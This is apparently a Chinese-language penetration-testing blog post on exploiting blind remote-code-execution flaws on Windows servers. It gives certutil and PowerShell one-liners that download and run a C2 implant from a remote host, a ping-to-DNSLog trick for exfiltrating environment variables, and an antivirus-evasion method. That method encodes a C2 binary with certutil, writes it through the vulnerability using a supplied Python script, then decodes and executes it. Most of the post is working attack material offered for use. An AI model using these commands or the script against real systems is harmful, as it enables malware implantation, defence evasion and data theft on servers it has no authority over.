0# 概述

在日常的渗透过程中，总会碰到一些RCE漏洞，无回显的RCE漏洞更是家常便饭。对于无回显的漏洞利用，网上有不少文章，但我看了半天，都是Linux系统的

当无回显RCE漏洞碰上Win服务器，我们又该何去何从呢？故创建本文做个记录

本人才疏学浅，如本人有所疏漏，也望各位师傅指点一番

1# 无回显上线C2

遇到无回显的RCE漏洞，上线C2是不二之选，但这部分并不是今天的重点：

上传C2到服务器一般有以下操作（针对Win）：

1. 通过WebShell上传C2文件并执行
2. 通过 Certutil 远程下载C2文件并执行
3. 通过 PowerShell 远程下载C2文件并执行

通过 Certutil 远程下载C2文件并执行

certutil -urlcache -gmt -split -f http://C2文件远程地址 C2文件名.exe && C2文件名.exe 执行参数

通过 PowerShell 远程下载C2文件并执行

powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://C2文件远程地址','C2文件名.exe') && C2文件名.exe 执行参数

但由于实际渗透场景的不同，根据账号权限、内网拓扑、安全软件的部署、安全设备的部署等种种情况的不同，很多时候我们并不能直接通过 Certutil 和 PowerShell 这两种方式来上线C2

2# 无回显RCE获取敏感信息

众所周知，Windows其实有很多环境变量，如下：

如何查看具体环境变量的内容呢？如下：

直接用echo就能查看：

echo %CommonProgramFiles%
echo %SYSTEMDRIVE%
echo %SystemRoot%

那当目标服务器无回显RCE的时候，我们要怎么利用呢？这时候就可以配合DnsLog将数据外带出来：

首先我们先生成一个DnsLog地址（当然可以用自建的DnsLog服务器）：

然后假设自己想知道目标机器的 %USERDOMAIN%（包含用户帐户的域的名称），就可以在命令行中执行以下内容：

ping -n 3 %USERDOMAIN%.刚才生成的DnsLog地址

这样就可以从DnsLog得知目标系统的环境变量了，实战如下：

这是某无回显RCE漏洞的实战场景（这个漏洞应该有师傅一看Payload就知道是哪个吧哈哈），利用这种方式直接能读取到目标系统的敏感信息

这里能通过Win的环境变量获取到很多有用的信息，能大大方便后续的渗透测试过程

3# 无回显ByPass上线C2

这里接 1# 无回显上线C2 的相关内容，现在调用 PowerShell 和 Certutil 远程下载C2文件并执行都是安全软件的高权重安全事件，都会被相关安全软件阻止，那我们有什么方法通过RCE漏洞上传可执行文件呢？

注：这部分的内容仅供参考，要结合实际情况

首先我们先要了解一个Windows系统的自带工具：Certutil

很多人只知道可以通过 Certutil 进行远程下载文件（会被杀软拦截），但不知道它还能加密解密本地文件（不会报毒，可以用来ByPassAV）

3.1 加密C2可执行文件

首先，准备好C2可执行文件，通过 Certutil 进行加密导出

Certutil -encode C2可执行文件名.exe out.txt

可以打开导出的TXT，看到文件有如下特征：

-----BEGIN CERTIFICATE-----
加密后的内容
-----END CERTIFICATE-----

3.2 如何通过RCE写入文件

众所周知，通过命令行使用 echo 命令可以进行文件写入，其实是可以分为追加写入和覆盖写入的：

覆盖写入样例（只要有写入权限，out.txt 里面的内容都会覆写）

echo 1 > out.txt
//将 1 覆盖写入 out.txt

追加写入样例（只要有写入权限，out.txt 里面的内容会被追加写入）

echo 1 >> out.txt
//将 1 追加写入到 out.txt 的末尾

那我们就可以将上文生成的 out.txt，通过这种方式写入到服务器上，然后在服务器上通过 Certutil 解码出来就行了

3.3 编写脚本批量写入

这个时候就可以编写一个Python脚本批量发包，通过RCE漏洞将内容写入服务器，样例如下：

#!/usr/bin/python3
# -*- coding: utf-8 -*-
import requests
import sys
import random
import re
import base64
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings()

def EXP(target_url, TxT):
    n = 1
    with open(TxT, 'r') as web:
        webs = web.readlines()
        for web in webs:
            web = web.strip()
            data = "rce= echo {} >> out.txt".format(web)     #RCE的相关传参内容，{}位置会被替换
            try:
                vuln_url = target_url + "漏洞相关路径"
                headers = {"Content-Type": "application/x-www-form-urlencoded",}
                requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
                response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5)
                if not('error' in response.text) and response.status_code == 200:
                    print("[+] 写入成功，响应码为:{} ".format(response.status_code)+" 这是第{}行信息".format(n))
                    n = n+1
                else:
                    print("[-] 写入中断，目标无响应\n ")
                    sys.exit(0)
            except Exception as e:
                print("[-] 请求目标失败 ", e)

if __name__ == '__main__':
    raw_url = str(input("请输入目标网站的URL\nUrl >>> "))
    if ('://' not in raw_url):
        raw_url = str("http://") + str(raw_url)
    if str(raw_url[-1]) != "/":
        raw_url = raw_url + "/"
    target_url = str(raw_url)
    print("正在尝试访问" + target_url)
    TxT = input("请输入要写入的TXT名字 >>> ")
    if TxT == "exit":
        sys.exit(0)
    else:
        EXP(target_url, TxT)

请根据自己的实际情况进行修改，脚本我随手写的，写的不好请见谅哈哈~

等批量写入完成后，可以解码并执行了，命令如下：

Certutil -decode out.txt out.exe
out.exe

4# 总结

很多时候，在学习或者工作中，碰到自己无法的解决的技术问题，不要马上丢给别人，自己一定要尝试去解决！虽然这个过程可能很痛苦，但随着自己摸索的过程，随着问题的解决，自己的能力和知识面就能逐渐提升和丰富

学习的过程便是如此，当你在未来回想这段时光的时候，一定会感谢那时努力的自己

No cross,no crown. 不见风雨，怎见彩虹？ 诸君以此自勉